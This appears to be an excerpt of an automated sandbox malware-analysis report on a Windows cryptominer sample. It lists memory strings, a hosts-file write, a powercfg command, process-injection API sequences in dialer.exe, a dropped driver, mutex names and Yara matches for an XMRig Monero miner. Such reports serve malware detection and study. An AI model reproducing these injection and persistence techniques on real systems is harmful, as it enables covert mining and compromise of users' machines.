          Source: updater.exe, 00000023.00000003.1763173486.0000015322AF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735657911.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000024.00000000.1735657911.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2225238357.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
          Source: lsass.exe, 00000024.00000002.3073692419.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735779276.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: lsass.exe, 00000024.00000000.1735657911.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2225238357.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
          Source: lsass.exe, 00000024.00000000.1735657911.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3072513252.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 00000024.00000002.3073556879.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735779276.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 00000024.00000002.3071949129.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735555511.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735657911.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 00000024.00000002.3073692419.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735779276.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2225238357.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
          Source: lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.
          Source: lsass.exe, 00000024.00000002.3073692419.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735779276.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074822998.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2225238357.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071949129.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735555511.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.c
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.cPS0~
          Source: lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2225238357.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Modifies the hosts file
          Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Uses powercfg.exe to modify the power settings
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,25_2_00000001400010C0
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,30_2_00000225DC6428C8
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AE202C NtQuerySystemInformation,StrCmpNIW,36_2_00000202C0AE202C
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AE253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,36_2_00000202C0AE253C
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDB28C8 NtEnumerateValueKey,NtEnumerateValueKey,40_2_000002BAAEDB28C8
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,62_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: 63_2_0000000140001394 NtResetWriteWatch,63_2_0000000140001394
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3A202C NtQuerySystemInformation,StrCmpNIW,69_2_000001845B3A202C
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\jxhirqfmeznn.sysJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_abowbhme.34k.ps1Jump to behavior
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C25_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400014D825_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000256025_2_0000000140002560
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC611F2C30_2_00000225DC611F2C
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC61D0E030_2_00000225DC61D0E0
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6238A830_2_00000225DC6238A8
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC642B2C30_2_00000225DC642B2C
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC64DCE030_2_00000225DC64DCE0
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6544A830_2_00000225DC6544A8
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC671F2C30_2_00000225DC671F2C
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC67D0E030_2_00000225DC67D0E0
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6838A830_2_00000225DC6838A8
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6A2B2C30_2_00000225DC6A2B2C
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6ADCE030_2_00000225DC6ADCE0
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6B44A830_2_00000225DC6B44A8
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AB1F2C36_2_00000202C0AB1F2C
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AC38A836_2_00000202C0AC38A8
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0ABD0E036_2_00000202C0ABD0E0
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AE2B2C36_2_00000202C0AE2B2C
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AF44A836_2_00000202C0AF44A8
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AEDCE036_2_00000202C0AEDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A6612D1F2C39_2_000002A6612D1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A6612DD0E039_2_000002A6612DD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A6612E38A839_2_000002A6612E38A8
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A661302B2C39_2_000002A661302B2C
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A66131AEC539_2_000002A66131AEC5
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A66130DCE039_2_000002A66130DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A6613144A839_2_000002A6613144A8
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAED81F2C40_2_000002BAAED81F2C
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAED8D0E040_2_000002BAAED8D0E0
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAED938A840_2_000002BAAED938A8
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDB2B2C40_2_000002BAAEDB2B2C
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDBDCE040_2_000002BAAEDBDCE0
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDC44A840_2_000002BAAEDC44A8
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000226C62_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_00000001400014D862_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000256062_2_0000000140002560
          Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000325063_2_0000000140003250
          Source: C:\Windows\System32\dialer.exeCode function: 63_2_00000001400027D063_2_00000001400027D0
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A8799D0E065_2_0000026A8799D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879A38A865_2_0000026A879A38A8
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A87991F2C65_2_0000026A87991F2C
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879CDCE065_2_0000026A879CDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879D44A865_2_0000026A879D44A8
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879C2B2C65_2_0000026A879C2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537838A866_2_00000179537838A8
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001795377D0E066_2_000001795377D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_0000017953771F2C66_2_0000017953771F2C
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537B44A866_2_00000179537B44A8
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537ADCE066_2_00000179537ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537A2B2C66_2_00000179537A2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D53D0E067_2_000002295D53D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D5438A867_2_000002295D5438A8
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D531F2C67_2_000002295D531F2C
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D56DCE067_2_000002295D56DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D5744A867_2_000002295D5744A8
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D562B2C67_2_000002295D562B2C
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_00000253067D1F2C68_2_00000253067D1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_00000253067DD0E068_2_00000253067DD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_00000253067E38A868_2_00000253067E38A8
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E62B2C68_2_0000025306E62B2C
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E6DCE068_2_0000025306E6DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E744A868_2_0000025306E744A8
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3B44A869_2_000001845B3B44A8
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3ADCE069_2_000001845B3ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3A2B2C69_2_000001845B3A2B2C
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\jxhirqfmeznn.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: classification engineClassification label: mal100.adwa.spyw.evad.mine.winEXE@87/15@1/1
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,25_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,62_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,25_2_00000001400019C4
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,25_2_000000014000226C
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3060:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6744:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6596:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2500:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5164:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5216:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
          Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\tolfdedwfkhaxzps
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3164:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1780:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5040:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4504:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7032:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6740:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiopesf5.dnm.ps1Jump to behavior
